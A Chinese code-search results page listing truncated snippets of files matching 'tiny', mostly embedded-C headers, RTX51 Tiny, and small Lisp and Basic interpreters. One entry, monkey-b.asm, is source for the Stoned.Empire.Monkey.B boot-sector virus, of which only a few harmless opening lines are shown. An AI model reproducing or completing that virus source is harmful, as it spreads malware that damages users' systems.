代码搜索:tiny

找到约 5,807 项符合「tiny」的源代码

代码结果 5,807
www.eeworm.com/read/425636/10343279

h processor.h

#include #if __CODEVISIONAVR__ < 1255 #error Minimume CodevisionAVR requered ver is: 1.25.5 #endif #define TINY_FAT 1 /* 0 means use FULL FAT firmware for Large memory systems wit
www.eeworm.com/read/421535/10731770

h macros.h

#ifndef __MACROS_H #define __MACROS_H 1 #if !defined(_AVR) #error "This file should only be used with ICCV7 for AVR" #endif /* FOR ATMEL AVR and TINY AVR ONLY! */ #ifndef BIT #define BIT(
www.eeworm.com/read/469930/6920971

h rtx51tny.h

/* RTX51TNY.H: RTX-51 TINY functions */ /* Copyright KEIL ELEKTRONIK GmbH 1991 V1.00 */ /* constants for os_wait function */ #define K_SIG 1 /* Wait for Signal */
www.eeworm.com/read/453274/7422998

h macros.h

#ifndef __MACROS_H #define __MACROS_H 1 #if !defined(_AVR) #error "This file should only be used with ICCV7 for AVR" #endif /* FOR ATMEL AVR and TINY AVR ONLY! */ #ifndef BIT #define BIT(
www.eeworm.com/read/451457/7463462

h os_support.h

/* Copyright (C) 2007 Jean-Marc Valin File: os_support.h This is the (tiny) OS abstraction layer. Aside from math.h, this is the only place where system headers are allowed. Redist
www.eeworm.com/read/445037/7600995

h macros.h

#ifndef __MACROS_H #define __MACROS_H 1 /* FOR ATMEL AVR and TINY AVR ONLY! */ #ifndef BIT #define BIT(x) (1
www.eeworm.com/read/444676/7609311

asm monkey-b.asm

; Stoned.Empire.Monkey.B .model tiny .code virus segment assume cs:virus,ds:virus org 100h begin: jmp short virus_start nop mov ss, ax mov
www.eeworm.com/read/299468/7848563

h macros.h

#ifndef __MACROS_H #define __MACROS_H 1 /* FOR ATMEL AVR and TINY AVR ONLY! */ #ifndef BIT #define BIT(x) (1
www.eeworm.com/read/433875/7905610

pl lisp.pl

#!/usr/bin/perl # # Lisp.pl: A tiny Lisp interpreter using Perl. # # This file and all associated files and documentation: # Copyright (C) 2000 Ali Onur Cinar # # Latest version c
www.eeworm.com/read/396732/8092600

c yabasic.c

/* YABASIC --- a tiny integrated Basic Compiler/Interpreter written by Marc-Oliver Ihm 1995-99. e-mail: ihm@kph.uni-mainz.de Current Version: */ #define BASIC_VERSION "2.45" /